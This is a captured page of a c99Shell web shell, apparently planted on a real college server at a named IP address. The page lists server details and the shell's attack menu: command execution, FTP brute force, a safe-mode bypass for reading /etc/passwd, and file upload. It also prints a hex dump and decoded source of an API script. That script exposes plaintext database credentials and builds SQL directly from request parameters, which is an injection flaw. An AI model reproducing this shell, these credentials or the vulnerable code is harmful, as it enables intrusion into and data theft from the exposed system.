110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/sync-eis-college/api/ drwxr-xr-x Free 52.3 GB of 127.8 GB (40.92%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686

uid=48(apache) gid=48(apache) groups=48(apache)

Safe-mode: OFF (not secure)

/var/www/html/sync-eis-college/api/ drwxr-xr-x
Free 52.3 GB of 127.8 GB (40.92%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

Viewing file: get-data.php (1.2 KB) -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

Information:

Path	/var/www/html/sync-eis-college/api/get-data.php
Size	1.2 KB
MD5	a217c01a0489616b157d360653d3bfe1
Owner/Group	root/root
Perms	-rw-r--r--
Create time	27/12/2017 15:25:06
Access time	31/07/2024 11:12:07
MODIFY time	14/11/2017 19:10:54

FULL HEXDUMP

00000000
00000018
00000030
00000048
00000060
00000078
00000090
000000A8
000000C0
000000D8
000000F0
00000108
00000120
00000138
00000150
00000168
00000180
00000198
000001B0
000001C8
000001E0
000001F8
00000210
00000228
00000240
00000258
00000270
00000288
000002A0
000002B8
000002D0
000002E8
00000300
00000318
00000330
00000348
00000360
00000378
00000390
000003A8
000003C0
000003D8
000003F0
00000408
00000420
00000438
00000450
00000468
00000480
00000498
000004B0
000004C8

3C 3F 70 68 70 0D 0A 09 65 72 72 6F 72 5F 72 65 70 6F 72 74 69 6E 67 28
45 5F 41 4C 4C 29 3B 0D 0A 20 20 20 20 69 6E 69 5F 73 65 74 28 27 64 69
73 70 6C 61 79 5F 65 72 72 6F 72 73 27 2C 20 31 29 3B 0D 0A 20 20 20 20
69 6E 69 5F 73 65 74 28 27 6D 65 6D 6F 72 79 5F 6C 69 6D 69 74 27 2C 27
31 36 4D 27 29 3B 0D 0A 20 20 20 20 72 65 71 75 69 72 65 5F 6F 6E 63 65
20 27 4A 53 4F 4E 2E 70 68 70 27 3B 0D 0A 09 68 65 61 64 65 72 28 27 43
6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 61 70 70 6C 69 63 61 74 69 6F 6E
2F 6A 73 6F 6E 3B 20 63 68 61 72 73 65 74 3D 75 74 66 2D 38 27 29 3B 0D
0A 09 0D 0A 09 24 74 61 62 6C 65 20 3D 20 24 5F 47 45 54 5B 22 74 61 62
6C 65 22 5D 3B 0D 0A 20 20 20 20 24 64 62 20 3D 20 24 5F 47 45 54 5B 22
64 62 22 5D 3B 0D 0A 20 20 20 20 24 6C 69 6D 69 74 20 3D 20 69 73 73 65
74 28 24 5F 47 45 54 5B 22 6C 69 6D 69 74 22 5D 29 20 3F 20 20 27 6C 69
6D 69 74 20 27 20 2E 20 24 5F 47 45 54 5B 22 6C 69 6D 69 74 22 5D 20 3A
20 27 27 3B 20 0D 0A 20 20 20 20 24 73 6B 69 70 20 3D 20 69 73 73 65 74
28 24 5F 47 45 54 5B 22 73 6B 69 70 22 5D 29 20 3F 20 20 27 20 6F 66 66
73 65 74 20 20 27 20 20 2E 20 24 5F 47 45 54 5B 22 73 6B 69 70 22 5D 20
3A 20 27 27 20 3B 20 20 0D 0A 0D 0A 20 20 20 20 24 69 73 43 6F 75 6E 74
20 3D 20 69 73 73 65 74 28 24 5F 47 45 54 5B 22 63 6F 75 6E 74 22 5D 29
3B 0D 0A 0D 0A 20 20 20 20 20 20 69 66 28 21 24 69 73 43 6F 75 6E 74 29
7B 0D 0A 20 20 20 20 20 20 20 20 24 73 71 6C 20 3D 20 22 73 65 6C 65 63
74 20 2A 20 66 72 6F 6D 20 20 60 24 74 61 62 6C 65 60 20 24 6C 69 6D 69
74 20 20 24 73 6B 69 70 22 3B 0D 0A 20 20 20 20 20 20 7D 65 6C 73 65 7B
0D 0A 20 20 20 20 20 20 20 20 24 73 71 6C 20 3D 20 22 73 65 6C 65 63 74
20 63 6F 75 6E 74 28 2A 29 20 61 73 20 63 20 66 72 6F 6D 20 20 20 60 24
74 61 62 6C 65 60 20 22 3B 0D 0A 20 20 20 20 20 20 7D 0D 0A 0D 0A 0D 0A
09 24 68 6F 73 74 20 3D 20 22 6C 6F 63 61 6C 68 6F 73 74 22 3B 0D 0A 09
24 75 73 65 72 6E 61 6D 65 20 3D 20 22 65 69 73 5F 73 79 6E 63 22 3B 0D
0A 09 24 70 61 73 73 77 6F 72 64 20 3D 20 22 50 40 73 73 77 30 72 64 40
32 30 31 37 22 3B 0D 0A 20 20 20 20 24 6F 62 6A 43 6F 6E 6E 65 63 74 20
3D 20 6D 79 73 71 6C 5F 63 6F 6E 6E 65 63 74 28 24 68 6F 73 74 2C 24 75
73 65 72 6E 61 6D 65 2C 24 70 61 73 73 77 6F 72 64 29 3B 0D 0A 0D 0A 09
24 6F 62 6A 44 42 20 3D 20 6D 79 73 71 6C 5F 73 65 6C 65 63 74 5F 64 62
28 24 64 62 29 3B 0D 0A 0D 0A 20 20 20 20 6D 79 73 71 6C 5F 71 75 65 72
79 28 22 53 45 54 20 4E 41 4D 45 53 20 55 54 46 38 22 29 3B 0D 0A 09 24
72 65 73 75 6C 74 20 3D 20 6D 79 73 71 6C 5F 71 75 65 72 79 28 24 73 71
6C 29 20 6F 72 20 64 69 65 20 28 6D 79 73 71 6C 5F 65 72 72 6F 72 28 29
29 3B 0D 0A 20 20 20 0D 0A 0D 0A 20 20 20 20 24 70 6F 73 74 20 3D 20 61
72 72 61 79 28 29 3B 0D 0A 20 20 20 20 77 68 69 6C 65 28 24 72 6F 77 20
3D 20 6D 79 73 71 6C 5F 66 65 74 63 68 5F 61 73 73 6F 63 28 24 72 65 73
75 6C 74 29 29 7B 0D 0A 20 20 20 20 20 20 20 20 24 70 6F 73 74 5B 5D 20
3D 20 24 72 6F 77 3B 0D 0A 20 20 20 20 7D 0D 0A 20 20 20 20 6D 79 73 71
6C 5F 66 72 65 65 5F 72 65 73 75 6C 74 28 24 72 65 73 75 6C 74 29 3B 0D
0A 0D 0A 20 20 20 20 24 61 72 72 20 3D 20 61 72 72 61 79 28 27 69 73 45
72 72 6F 72 27 20 3D 3E 20 66 61 6C 73 65 20 2C 20 27 64 61 74 61 27 20
3D 3E 20 24 69 73 43 6F 75 6E 74 20 3F 20 24 70 6F 73 74 5B 30 5D 5B 22
63 22 5D 20 3A 20 24 70 6F 73 74 29 3B 0D 0A 20 20 20 20 2F 2F 65 63 68
6F 20 6A 73 6F 6E 5F 65 6E 63 6F 64 65 28 24 61 72 72 29 3B 0D 0A 20 20
20 20 24 6A 73 6F 6E 20 3D 20 6E 65 77 20 53 65 72 76 69 63 65 73 5F 4A
53 4F 4E 3B 0D 0A 20 20 20 20 65 63 68 6F 20 20 24 6A 73 6F 6E 2D 3E 65
6E 63 6F 64 65 28 24 61 72 72 29 3B 0D 0A 0D 0A 0D 0A 20 20 20 20 6D 79
73 71 6C 5F 63 6C 6F 73 65 28 24 6F 62 6A 43 6F 6E 6E 65 63 74 29 3B 0D
0A 0D 0A 3F 3E 0D 0A

<?php   error_reporting(
E_ALL);      ini_set('di
splay_errors', 1);
ini_set('memory_limit','
16M');      require_once
'JSON.php';   header('C
ontent-Type: application
/json; charset=utf-8');
   $table = $_GET["tab
le"];      $db = $_GET["
db"];      $limit = isse
t($_GET["limit"]) ?  'li
mit ' . $_GET["limit"] :
'';       $skip = isset
($_GET["skip"]) ?  ' off
set  '  . $_GET["skip"]
: '' ;          $isCount
= isset($_GET["count"])
;          if(!$isCount)
{          $sql = "selec
t * from  `$table` $limi
t  $skip";        }else{
          $sql = "select
count(*) as c from   `$
table` ";        }
$host = "localhost";
$username = "eis_sync";
$password = "P@ssw0rd@
2017";      $objConnect
= mysql_connect($host,$u
sername,$password);
$objDB = mysql_select_db
($db);        mysql_quer
y("SET NAMES UTF8");   $
result = mysql_query($sq
l) or die (mysql_error()
);             $post = a
rray();      while($row
= mysql_fetch_assoc($res
ult)){          $post[]
= $row;      }      mysq
l_free_result($result);
       $arr = array('isE
rror' => false , 'data'
=> $isCount ? $post[0]["
c"] : $post);      //ech
o json_encode($arr);
  $json = new Services_J
SON;      echo  $json->e
ncode($arr);          my
sql_close($objConnect);
   ?>

HEXDUMP: [Full] [Preview]
Base64: [Encode] [+chunk] [+chunk+quotes] [Decode]

:: Command execute ::
Enter:	Select:

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Search ::

:: Upload ::

:: Make Dir ::

:: Make File ::

:: Go Dir ::

:: Go File ::

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0104 ]--